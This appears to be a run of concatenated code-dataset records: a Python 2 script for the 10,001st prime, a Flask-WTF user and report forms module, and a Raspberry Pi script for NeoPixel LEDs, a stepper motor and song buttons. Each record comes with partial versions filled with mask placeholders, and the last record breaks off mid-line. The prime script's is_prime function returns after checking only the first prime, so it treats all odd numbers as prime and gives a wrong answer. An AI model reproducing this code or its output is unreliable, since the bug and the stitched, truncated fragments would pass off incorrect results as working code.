{ "blob_id": "e5e516b6a39a6df03f1e5f80fe2d9e3978e856aa", "index": 2310, "step-1": "# What is the 10 001st prime number?\n\nprimes = [2]\n\n\ndef is_prime(a, primes):\n b = a\n for x in primes:\n d, m = divmod(b, x)\n if m == 0:\n return False\n else:\n return True\n\n\na = 3\nwhile len(primes) <= 10001:\n # There's something faster than just checking all of them, but this\n # will do for now.\n if is_prime(a, primes):\n primes.append(a)\n print a\n a += 1\n\n\nprint primes[10000]\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from flask_wtf import FlaskForm from wtforms import ( StringField, TextAreaField, PasswordField, HiddenField) from wtforms.fields.html5 import URLField, EmailField from flask_wtf.file import FileField from wtforms.validators import ( InputRequired, Length, Email, Optional, URL, ValidationError, Regexp) from models import User from flask import g class UserBaseForm(FlaskForm): email = EmailField("Email", validators=[ InputRequired(message="Email cannot be blank."), Length(min=5, max=320), Email(check_deliverability=True, message="Invalid Email address")]) username = StringField("Username", validators=[ InputRequired(message="Username cannot be blank."), Length(min=2, max=30)]) class AddUserForm(UserBaseForm): password = PasswordField("Password", validators=[ InputRequired(message="Password cannot be blank."), Length(min=8, max=60), Regexp("^(?=.*[A-Za-z])(?=.*\d)(?=.*[$@$!%*#?&])[A-Za-z\d$@$!%*#?&]{8,}$", message='Please match the given requirements for password.')], # noqa e501 description="Minimum one each - uppercase letter, lowercase letter, number, special character.") # noqa e501 def validate_email(form, field): """Make sure email not in use.""" if User.query.filter_by(email=form.email.data).first(): form.email.errors.append( "Email already associated with account!") raise ValidationError def validate_username(form, field): """Make sure username not in use.""" if User.query.filter_by(username=form.username.data).first(): form.username.errors.append("Username already taken!") raise ValidationError class EditUserForm(UserBaseForm): """Edit User Form.""" avatar_url = URLField("Avatar Image URL", validators=[ Length(min=6, max=255), Optional()], description="Online image address") banner_url = URLField("Banner Image URL", validators=[ Length(min=6, max=255), Optional()], description="Online image address") byline = StringField("User Byline", validators=[ Length(min=2, max=200), Optional()], description="A short snippet shown under your username") bio = TextAreaField("User Bio", validators=[ Length(min=2, max=500), Optional()], description="500 character max") city = StringField("City", validators=[Length(min=2, max=50), Optional()]) state = StringField("State", validators=[ Length(min=2, max=50), Optional()]) country = StringField("Country", validators=[ Length(min=2, max=50), Optional()]) def validate_email(form, field): """Make sure email is not in use unless it's the current user's email.""" user = User.query.filter_by(email=form.email.data).first() if user and not user == g.user: form.email.errors = [ "Email already associated with account!", *form.email.errors ] raise ValidationError def validate_username(form, field): """Make sure username is not in use unless it's the current user's username.""" user = User.query.filter_by(username=form.username.data).first() if user and not user == g.user: form.username.errors = [ "Username already taken!", *form.username.errors ] raise ValidationError class LoginForm(FlaskForm): email = EmailField("Email", validators=[ InputRequired(message="Email cannot be blank."), Length(min=5, max=320), Email(check_deliverability=True, message="Invalid Email address")]) password = PasswordField("Password", validators=[ InputRequired( message="Password cannot be blank."), Length(min=8, max=60)]) class ReportBaseForm(FlaskForm): """Form for adding new report.""" text = TextAreaField("Report", validators=[ InputRequired(message="Report cannot be blank."), Length(min=2)]) photo_url = URLField( "Photo URL", validators=[URL(), Optional()], description=""" Either enter a photo URL or choose an image file to include an image.""") photo_file = FileField( "Upload Photo", validators=[Optional()], description=""" Either enter a photo URL or choose an image file to include an image. 4MB max.""") def validate(self): if not super().validate(): return False if self.photo_url.data and self.photo_file.data: msg = 'Please specify Photo URL or upload a photo, not both' self.photo_url.errors.append(msg) self.photo_file.errors.append(msg) return False return True class AddReportForm(ReportBaseForm): """Form for adding new report.""" pass class EditReportForm(ReportBaseForm): """Form for editing a report.""" cleared_file = HiddenField('cleared_file')
normal
{ "blob_id": "47b2857ac20e46897cc1f64371868ce5174799d6", "index": 4790, "step-1": "<mask token>\n\n\nclass AddReportForm(ReportBaseForm):\n \"\"\"Form for adding new report.\"\"\"\n pass\n\n\nclass EditReportForm(ReportBaseForm):\n \"\"\"Form for editing a report.\"\"\"\n cleared_file = HiddenField('cleared_file')\n", "step-2": "<mask token>\n\n\nclass EditUserForm(UserBaseForm):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def validate_email(form, field):\n \"\"\"Make sure email is not in use\n unless it's the current user's email.\"\"\"\n user = User.query.filter_by(email=form.email.data).first()\n if user and not user == g.user:\n form.email.errors = ['Email already associated with account!',\n *form.email.errors]\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username is not in use\n unless it's the current user's username.\"\"\"\n user = User.query.filter_by(username=form.username.data).first()\n if user and not user == g.user:\n form.username.errors = ['Username already taken!', *form.\n username.errors]\n raise ValidationError\n\n\nclass LoginForm(FlaskForm):\n email = EmailField('Email', validators=[InputRequired(message=\n 'Email cannot be blank.'), Length(min=5, max=320), Email(\n check_deliverability=True, message='Invalid Email address')])\n password = PasswordField('Password', validators=[InputRequired(message=\n 'Password cannot be blank.'), Length(min=8, max=60)])\n\n\nclass ReportBaseForm(FlaskForm):\n \"\"\"Form for adding new report.\"\"\"\n text = TextAreaField('Report', validators=[InputRequired(message=\n 'Report cannot be blank.'), Length(min=2)])\n photo_url = URLField('Photo URL', validators=[URL(), Optional()],\n description=\n \"\"\"\n Either enter a photo URL or\n choose an image file to include an image.\"\"\"\n )\n photo_file = FileField('Upload Photo', validators=[Optional()],\n description=\n \"\"\"\n Either enter a photo URL or\n choose an image file to include an image. 4MB max.\"\"\"\n )\n\n def validate(self):\n if not super().validate():\n return False\n if self.photo_url.data and self.photo_file.data:\n msg = 'Please specify Photo URL or upload a photo, not both'\n self.photo_url.errors.append(msg)\n self.photo_file.errors.append(msg)\n return False\n return True\n\n\nclass AddReportForm(ReportBaseForm):\n \"\"\"Form for adding new report.\"\"\"\n pass\n\n\nclass EditReportForm(ReportBaseForm):\n \"\"\"Form for editing a report.\"\"\"\n cleared_file = HiddenField('cleared_file')\n", "step-3": "<mask token>\n\n\nclass AddUserForm(UserBaseForm):\n password = PasswordField('Password', validators=[InputRequired(message=\n 'Password cannot be blank.'), Length(min=8, max=60), Regexp(\n '^(?=.*[A-Za-z])(?=.*\\\\d)(?=.*[$@$!%*#?&])[A-Za-z\\\\d$@$!%*#?&]{8,}$',\n message='Please match the given requirements for password.')],\n description=\n 'Minimum one each - uppercase letter, lowercase letter, number, special character.'\n )\n\n def validate_email(form, field):\n \"\"\"Make sure email not in use.\"\"\"\n if User.query.filter_by(email=form.email.data).first():\n form.email.errors.append('Email already associated with account!')\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username not in use.\"\"\"\n if User.query.filter_by(username=form.username.data).first():\n form.username.errors.append('Username already taken!')\n raise ValidationError\n\n\nclass EditUserForm(UserBaseForm):\n \"\"\"Edit User Form.\"\"\"\n avatar_url = URLField('Avatar Image URL', validators=[Length(min=6, max\n =255), Optional()], description='Online image address')\n banner_url = URLField('Banner Image URL', validators=[Length(min=6, max\n =255), Optional()], description='Online image address')\n byline = StringField('User Byline', validators=[Length(min=2, max=200),\n Optional()], description='A short snippet shown under your username')\n bio = TextAreaField('User Bio', validators=[Length(min=2, max=500),\n Optional()], description='500 character max')\n city = StringField('City', validators=[Length(min=2, max=50), Optional()])\n state = StringField('State', validators=[Length(min=2, max=50), Optional()]\n )\n country = StringField('Country', validators=[Length(min=2, max=50),\n Optional()])\n\n def validate_email(form, field):\n \"\"\"Make sure email is not in use\n unless it's the current user's email.\"\"\"\n user = User.query.filter_by(email=form.email.data).first()\n if user and not user == g.user:\n form.email.errors = ['Email already associated with account!',\n *form.email.errors]\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username is not in use\n unless it's the current user's username.\"\"\"\n user = User.query.filter_by(username=form.username.data).first()\n if user and not user == g.user:\n form.username.errors = ['Username already taken!', *form.\n username.errors]\n raise ValidationError\n\n\nclass LoginForm(FlaskForm):\n email = EmailField('Email', validators=[InputRequired(message=\n 'Email cannot be blank.'), Length(min=5, max=320), Email(\n check_deliverability=True, message='Invalid Email address')])\n password = PasswordField('Password', validators=[InputRequired(message=\n 'Password cannot be blank.'), Length(min=8, max=60)])\n\n\nclass ReportBaseForm(FlaskForm):\n \"\"\"Form for adding new report.\"\"\"\n text = TextAreaField('Report', validators=[InputRequired(message=\n 'Report cannot be blank.'), Length(min=2)])\n photo_url = URLField('Photo URL', validators=[URL(), Optional()],\n description=\n \"\"\"\n Either enter a photo URL or\n choose an image file to include an image.\"\"\"\n )\n photo_file = FileField('Upload Photo', validators=[Optional()],\n description=\n \"\"\"\n Either enter a photo URL or\n choose an image file to include an image. 4MB max.\"\"\"\n )\n\n def validate(self):\n if not super().validate():\n return False\n if self.photo_url.data and self.photo_file.data:\n msg = 'Please specify Photo URL or upload a photo, not both'\n self.photo_url.errors.append(msg)\n self.photo_file.errors.append(msg)\n return False\n return True\n\n\nclass AddReportForm(ReportBaseForm):\n \"\"\"Form for adding new report.\"\"\"\n pass\n\n\nclass EditReportForm(ReportBaseForm):\n \"\"\"Form for editing a report.\"\"\"\n cleared_file = HiddenField('cleared_file')\n", "step-4": "<mask token>\n\n\nclass UserBaseForm(FlaskForm):\n email = EmailField('Email', validators=[InputRequired(message=\n 'Email cannot be blank.'), Length(min=5, max=320), Email(\n check_deliverability=True, message='Invalid Email address')])\n username = StringField('Username', validators=[InputRequired(message=\n 'Username cannot be blank.'), Length(min=2, max=30)])\n\n\nclass AddUserForm(UserBaseForm):\n password = PasswordField('Password', validators=[InputRequired(message=\n 'Password cannot be blank.'), Length(min=8, max=60), Regexp(\n '^(?=.*[A-Za-z])(?=.*\\\\d)(?=.*[$@$!%*#?&])[A-Za-z\\\\d$@$!%*#?&]{8,}$',\n message='Please match the given requirements for password.')],\n description=\n 'Minimum one each - uppercase letter, lowercase letter, number, special character.'\n )\n\n def validate_email(form, field):\n \"\"\"Make sure email not in use.\"\"\"\n if User.query.filter_by(email=form.email.data).first():\n form.email.errors.append('Email already associated with account!')\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username not in use.\"\"\"\n if User.query.filter_by(username=form.username.data).first():\n form.username.errors.append('Username already taken!')\n raise ValidationError\n\n\nclass EditUserForm(UserBaseForm):\n \"\"\"Edit User Form.\"\"\"\n avatar_url = URLField('Avatar Image URL', validators=[Length(min=6, max\n =255), Optional()], description='Online image address')\n banner_url = URLField('Banner Image URL', validators=[Length(min=6, max\n =255), Optional()], description='Online image address')\n byline = StringField('User Byline', validators=[Length(min=2, max=200),\n Optional()], description='A short snippet shown under your username')\n bio = TextAreaField('User Bio', validators=[Length(min=2, max=500),\n Optional()], description='500 character max')\n city = StringField('City', validators=[Length(min=2, max=50), Optional()])\n state = StringField('State', validators=[Length(min=2, max=50), Optional()]\n )\n country = StringField('Country', validators=[Length(min=2, max=50),\n Optional()])\n\n def validate_email(form, field):\n \"\"\"Make sure email is not in use\n unless it's the current user's email.\"\"\"\n user = User.query.filter_by(email=form.email.data).first()\n if user and not user == g.user:\n form.email.errors = ['Email already associated with account!',\n *form.email.errors]\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username is not in use\n unless it's the current user's username.\"\"\"\n user = User.query.filter_by(username=form.username.data).first()\n if user and not user == g.user:\n form.username.errors = ['Username already taken!', *form.\n username.errors]\n raise ValidationError\n\n\nclass LoginForm(FlaskForm):\n email = EmailField('Email', validators=[InputRequired(message=\n 'Email cannot be blank.'), Length(min=5, max=320), Email(\n check_deliverability=True, message='Invalid Email address')])\n password = PasswordField('Password', validators=[InputRequired(message=\n 'Password cannot be blank.'), Length(min=8, max=60)])\n\n\nclass ReportBaseForm(FlaskForm):\n \"\"\"Form for adding new report.\"\"\"\n text = TextAreaField('Report', validators=[InputRequired(message=\n 'Report cannot be blank.'), Length(min=2)])\n photo_url = URLField('Photo URL', validators=[URL(), Optional()],\n description=\n \"\"\"\n Either enter a photo URL or\n choose an image file to include an image.\"\"\"\n )\n photo_file = FileField('Upload Photo', validators=[Optional()],\n description=\n \"\"\"\n Either enter a photo URL or\n choose an image file to include an image. 4MB max.\"\"\"\n )\n\n def validate(self):\n if not super().validate():\n return False\n if self.photo_url.data and self.photo_file.data:\n msg = 'Please specify Photo URL or upload a photo, not both'\n self.photo_url.errors.append(msg)\n self.photo_file.errors.append(msg)\n return False\n return True\n\n\nclass AddReportForm(ReportBaseForm):\n \"\"\"Form for adding new report.\"\"\"\n pass\n\n\nclass EditReportForm(ReportBaseForm):\n \"\"\"Form for editing a report.\"\"\"\n cleared_file = HiddenField('cleared_file')\n", "step-5": "from flask_wtf import FlaskForm\nfrom wtforms import (\n StringField, TextAreaField, PasswordField, HiddenField)\nfrom wtforms.fields.html5 import URLField, EmailField\nfrom flask_wtf.file import FileField\nfrom wtforms.validators import (\n InputRequired, Length, Email,\n Optional, URL, ValidationError, Regexp)\nfrom models import User\nfrom flask import g\n\n\nclass UserBaseForm(FlaskForm):\n email = EmailField(\"Email\", validators=[\n InputRequired(message=\"Email cannot be blank.\"),\n Length(min=5, max=320),\n Email(check_deliverability=True,\n message=\"Invalid Email address\")])\n\n username = StringField(\"Username\", validators=[\n InputRequired(message=\"Username cannot be blank.\"),\n Length(min=2, max=30)])\n\n\nclass AddUserForm(UserBaseForm):\n\n password = PasswordField(\"Password\", validators=[\n InputRequired(message=\"Password cannot be blank.\"),\n Length(min=8, max=60),\n Regexp(\"^(?=.*[A-Za-z])(?=.*\\d)(?=.*[$@$!%*#?&])[A-Za-z\\d$@$!%*#?&]{8,}$\", message='Please match the given requirements for password.')], # noqa e501\n description=\"Minimum one each - uppercase letter, lowercase letter, number, special character.\") # noqa e501\n\n def validate_email(form, field):\n \"\"\"Make sure email not in use.\"\"\"\n if User.query.filter_by(email=form.email.data).first():\n form.email.errors.append(\n \"Email already associated with account!\")\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username not in use.\"\"\"\n if User.query.filter_by(username=form.username.data).first():\n form.username.errors.append(\"Username already taken!\")\n raise ValidationError\n\n\nclass EditUserForm(UserBaseForm):\n \"\"\"Edit User Form.\"\"\"\n\n avatar_url = URLField(\"Avatar Image URL\", validators=[\n Length(min=6, max=255), Optional()],\n description=\"Online image address\")\n\n banner_url = URLField(\"Banner Image URL\", validators=[\n Length(min=6, max=255), Optional()],\n description=\"Online image address\")\n\n byline = StringField(\"User Byline\", validators=[\n Length(min=2, max=200), Optional()],\n description=\"A short snippet shown under your username\")\n\n bio = TextAreaField(\"User Bio\", validators=[\n Length(min=2, max=500), Optional()],\n description=\"500 character max\")\n\n city = StringField(\"City\", validators=[Length(min=2, max=50), Optional()])\n\n state = StringField(\"State\", validators=[\n Length(min=2, max=50), Optional()])\n\n country = StringField(\"Country\", validators=[\n Length(min=2, max=50), Optional()])\n\n def validate_email(form, field):\n \"\"\"Make sure email is not in use\n unless it's the current user's email.\"\"\"\n\n user = User.query.filter_by(email=form.email.data).first()\n\n if user and not user == g.user:\n form.email.errors = [\n \"Email already associated with account!\",\n *form.email.errors\n ]\n raise ValidationError\n\n def validate_username(form, field):\n \"\"\"Make sure username is not in use\n unless it's the current user's username.\"\"\"\n\n user = User.query.filter_by(username=form.username.data).first()\n\n if user and not user == g.user:\n form.username.errors = [\n \"Username already taken!\",\n *form.username.errors\n ]\n raise ValidationError\n\n\nclass LoginForm(FlaskForm):\n email = EmailField(\"Email\", validators=[\n InputRequired(message=\"Email cannot be blank.\"),\n Length(min=5, max=320),\n Email(check_deliverability=True,\n message=\"Invalid Email address\")])\n\n password = PasswordField(\"Password\", validators=[\n InputRequired(\n message=\"Password cannot be blank.\"),\n Length(min=8, max=60)])\n\n\nclass ReportBaseForm(FlaskForm):\n \"\"\"Form for adding new report.\"\"\"\n\n text = TextAreaField(\"Report\", validators=[\n InputRequired(message=\"Report cannot be blank.\"),\n Length(min=2)])\n\n photo_url = URLField(\n \"Photo URL\", validators=[URL(), Optional()],\n description=\"\"\"\n Either enter a photo URL or\n choose an image file to include an image.\"\"\")\n\n photo_file = FileField(\n \"Upload Photo\", validators=[Optional()],\n description=\"\"\"\n Either enter a photo URL or\n choose an image file to include an image. 4MB max.\"\"\")\n\n def validate(self):\n if not super().validate():\n return False\n if self.photo_url.data and self.photo_file.data:\n msg = 'Please specify Photo URL or upload a photo, not both'\n self.photo_url.errors.append(msg)\n self.photo_file.errors.append(msg)\n return False\n return True\n\n\nclass AddReportForm(ReportBaseForm):\n \"\"\"Form for adding new report.\"\"\"\n\n pass\n\n\nclass EditReportForm(ReportBaseForm):\n \"\"\"Form for editing a report.\"\"\"\n\n cleared_file = HiddenField('cleared_file')\n", "step-ids": [ 5, 14, 20, 22, 24 ] }
[ 5, 14, 20, 22, 24 ]
import os import RPi.GPIO as GPIO import time import neopixel import board GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) GPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Setup button pins GPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) GPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) GPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) enable_pin = 24 #Setup stepper motor pins A1Pin = 23 A2Pin = 22 B1Pin = 27 B2Pin = 17 GPIO.setup(enable_pin, GPIO.OUT) GPIO.setup(A1Pin, GPIO.OUT) GPIO.setup(A2Pin, GPIO.OUT) GPIO.setup(B1Pin, GPIO.OUT) GPIO.setup(B2Pin, GPIO.OUT) GPIO.output(enable_pin, 1) pixel_pin = board.D21 #Setup Neopixels num_pixels = 60 ORDER = neopixel.GRB CLEAR = (0,0,0) pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.03, auto_write=False, pixel_order=ORDER) pixel = neopixel.NeoPixel(pixel_pin, num_pixels, brightness = 0.1, pixel_order = ORDER) def setStep(w1,w2,w3,w4): #Send instructions to the stepper motor GPIO.output(A1Pin, w1) GPIO.output(A2Pin, w2) GPIO.output(B1Pin, w3) GPIO.output(B2Pin, w4) def wheel(pos): #Function to generate a wheel on NeoPixels, taken from Adafruit # Input a value 0 to 255 to get a color value. # The colours are a transition r - g - b - back to r. if pos < 0 or pos > 255: r = g = b = 0 elif pos < 85: r = int(pos * 3) g = int(255 - pos*3) b = 0 elif pos < 170: pos -= 85 r = int(255 - pos*3) g = 0 b = int(pos*3) else: pos -= 170 r = 0 g = int(pos*3) b = int(255 - pos*3) return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0) def rainbow_cycle(wait): #Function to make the wheel transition through the entire colour spectrum, taken from Adafruit for j in range(255): for i in range(num_pixels): pixel_index = (i * 256 // num_pixels) + j pixels[i] = wheel(pixel_index & 255) pixels.show() time.sleep(wait) stepList = [(1,0,0,0),(1,1,0,0),(0,1,0,0),(0,1,1,0),(0,0,1,0),(0,0,1,1),(0,0,0,1),(1,0,0,1)] #List of positions for stepper motor count = 0 def backwards(list, count): #Function to turn the motor backwards by sending the stepList in a certian way w1 = list[count][0] w2 = list[count][1] w3 = list[count][2] w4 = list[count][3] setStep(w1,w2,w3,w4) count+=1 if count >= 8: count = 0 return count for i in range(60): #Loading circle, shows Gizmo is ready to use pixel[i] = (200,100,0) time.sleep(0.02) while True: for j in range(255): #NeoPixels transistion through rainbow colours for i in range(num_pixels): pixel_index = (i * 256 // num_pixels) + j pixels[i] = wheel(pixel_index & 255) pixels.show() time.sleep(0.005) if GPIO.input(20) == GPIO.HIGH: # Button 1 turns the pointer back to the start position count = backwards(stepList, count) print ("Pin 20") if GPIO.input(13) == GPIO.HIGH: # The other buttons select the songs print ("Here comes the sun") os.system("python3 song2.py") if GPIO.input(19) == GPIO.HIGH: print ("Button - September") os.system("python3 song4.py") if GPIO.input(26) == GPIO.HIGH: print ("Button (26) 4 - Wonderwall") os.system("python3 song1.py") if GPIO.input(16) == GPIO.HIGH: print ("Button (16) 6 - Shape of You") os.system("python3 song5.py")
normal
{ "blob_id": "4a711642af753ba2c82ce3351b052a4973e17e7d", "index": 9672, "step-1": "<mask token>\n\n\ndef setStep(w1, w2, w3, w4):\n GPIO.output(A1Pin, w1)\n GPIO.output(A2Pin, w2)\n GPIO.output(B1Pin, w3)\n GPIO.output(B2Pin, w4)\n\n\ndef wheel(pos):\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos * 3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos * 3)\n g = 0\n b = int(pos * 3)\n else:\n pos -= 170\n r = 0\n g = int(pos * 3)\n b = int(255 - pos * 3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r,\n g, b, 0)\n\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\n\n<mask token>\n\n\ndef backwards(list, count):\n w1 = list[count][0]\n w2 = list[count][1]\n w3 = list[count][2]\n w4 = list[count][3]\n setStep(w1, w2, w3, w4)\n count += 1\n if count >= 8:\n count = 0\n return count\n\n\n<mask token>\n", "step-2": "<mask token>\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n<mask token>\nGPIO.setup(enable_pin, GPIO.OUT)\nGPIO.setup(A1Pin, GPIO.OUT)\nGPIO.setup(A2Pin, GPIO.OUT)\nGPIO.setup(B1Pin, GPIO.OUT)\nGPIO.setup(B2Pin, GPIO.OUT)\nGPIO.output(enable_pin, 1)\n<mask token>\n\n\ndef setStep(w1, w2, w3, w4):\n GPIO.output(A1Pin, w1)\n GPIO.output(A2Pin, w2)\n GPIO.output(B1Pin, w3)\n GPIO.output(B2Pin, w4)\n\n\ndef wheel(pos):\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos * 3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos * 3)\n g = 0\n b = int(pos * 3)\n else:\n pos -= 170\n r = 0\n g = int(pos * 3)\n b = int(255 - pos * 3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r,\n g, b, 0)\n\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\n\n<mask token>\n\n\ndef backwards(list, count):\n w1 = list[count][0]\n w2 = list[count][1]\n w3 = list[count][2]\n w4 = list[count][3]\n setStep(w1, w2, w3, w4)\n count += 1\n if count >= 8:\n count = 0\n return count\n\n\nfor i in range(60):\n pixel[i] = 200, 100, 0\n time.sleep(0.02)\nwhile True:\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(0.005)\n if GPIO.input(20) == GPIO.HIGH:\n count = backwards(stepList, count)\n print('Pin 20')\n if GPIO.input(13) == GPIO.HIGH:\n print('Here comes the sun')\n os.system('python3 song2.py')\n if GPIO.input(19) == GPIO.HIGH:\n print('Button - September')\n os.system('python3 song4.py')\n if GPIO.input(26) == GPIO.HIGH:\n print('Button (26) 4 - Wonderwall')\n os.system('python3 song1.py')\n if GPIO.input(16) == GPIO.HIGH:\n print('Button (16) 6 - Shape of You')\n os.system('python3 song5.py')\n", "step-3": "<mask token>\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nenable_pin = 24\nA1Pin = 23\nA2Pin = 22\nB1Pin = 27\nB2Pin = 17\nGPIO.setup(enable_pin, GPIO.OUT)\nGPIO.setup(A1Pin, GPIO.OUT)\nGPIO.setup(A2Pin, GPIO.OUT)\nGPIO.setup(B1Pin, GPIO.OUT)\nGPIO.setup(B2Pin, GPIO.OUT)\nGPIO.output(enable_pin, 1)\npixel_pin = board.D21\nnum_pixels = 60\nORDER = neopixel.GRB\nCLEAR = 0, 0, 0\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.03,\n auto_write=False, pixel_order=ORDER)\npixel = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.1,\n pixel_order=ORDER)\n\n\ndef setStep(w1, w2, w3, w4):\n GPIO.output(A1Pin, w1)\n GPIO.output(A2Pin, w2)\n GPIO.output(B1Pin, w3)\n GPIO.output(B2Pin, w4)\n\n\ndef wheel(pos):\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos * 3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos * 3)\n g = 0\n b = int(pos * 3)\n else:\n pos -= 170\n r = 0\n g = int(pos * 3)\n b = int(255 - pos * 3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r,\n g, b, 0)\n\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\n\nstepList = [(1, 0, 0, 0), (1, 1, 0, 0), (0, 1, 0, 0), (0, 1, 1, 0), (0, 0, \n 1, 0), (0, 0, 1, 1), (0, 0, 0, 1), (1, 0, 0, 1)]\ncount = 0\n\n\ndef backwards(list, count):\n w1 = list[count][0]\n w2 = list[count][1]\n w3 = list[count][2]\n w4 = list[count][3]\n setStep(w1, w2, w3, w4)\n count += 1\n if count >= 8:\n count = 0\n return count\n\n\nfor i in range(60):\n pixel[i] = 200, 100, 0\n time.sleep(0.02)\nwhile True:\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(0.005)\n if GPIO.input(20) == GPIO.HIGH:\n count = backwards(stepList, count)\n print('Pin 20')\n if GPIO.input(13) == GPIO.HIGH:\n print('Here comes the sun')\n os.system('python3 song2.py')\n if GPIO.input(19) == GPIO.HIGH:\n print('Button - September')\n os.system('python3 song4.py')\n if GPIO.input(26) == GPIO.HIGH:\n print('Button (26) 4 - Wonderwall')\n os.system('python3 song1.py')\n if GPIO.input(16) == GPIO.HIGH:\n print('Button (16) 6 - Shape of You')\n os.system('python3 song5.py')\n", "step-4": "import os\nimport RPi.GPIO as GPIO\nimport time\nimport neopixel\nimport board\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nenable_pin = 24\nA1Pin = 23\nA2Pin = 22\nB1Pin = 27\nB2Pin = 17\nGPIO.setup(enable_pin, GPIO.OUT)\nGPIO.setup(A1Pin, GPIO.OUT)\nGPIO.setup(A2Pin, GPIO.OUT)\nGPIO.setup(B1Pin, GPIO.OUT)\nGPIO.setup(B2Pin, GPIO.OUT)\nGPIO.output(enable_pin, 1)\npixel_pin = board.D21\nnum_pixels = 60\nORDER = neopixel.GRB\nCLEAR = 0, 0, 0\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.03,\n auto_write=False, pixel_order=ORDER)\npixel = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.1,\n pixel_order=ORDER)\n\n\ndef setStep(w1, w2, w3, w4):\n GPIO.output(A1Pin, w1)\n GPIO.output(A2Pin, w2)\n GPIO.output(B1Pin, w3)\n GPIO.output(B2Pin, w4)\n\n\ndef wheel(pos):\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos * 3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos * 3)\n g = 0\n b = int(pos * 3)\n else:\n pos -= 170\n r = 0\n g = int(pos * 3)\n b = int(255 - pos * 3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r,\n g, b, 0)\n\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\n\nstepList = [(1, 0, 0, 0), (1, 1, 0, 0), (0, 1, 0, 0), (0, 1, 1, 0), (0, 0, \n 1, 0), (0, 0, 1, 1), (0, 0, 0, 1), (1, 0, 0, 1)]\ncount = 0\n\n\ndef backwards(list, count):\n w1 = list[count][0]\n w2 = list[count][1]\n w3 = list[count][2]\n w4 = list[count][3]\n setStep(w1, w2, w3, w4)\n count += 1\n if count >= 8:\n count = 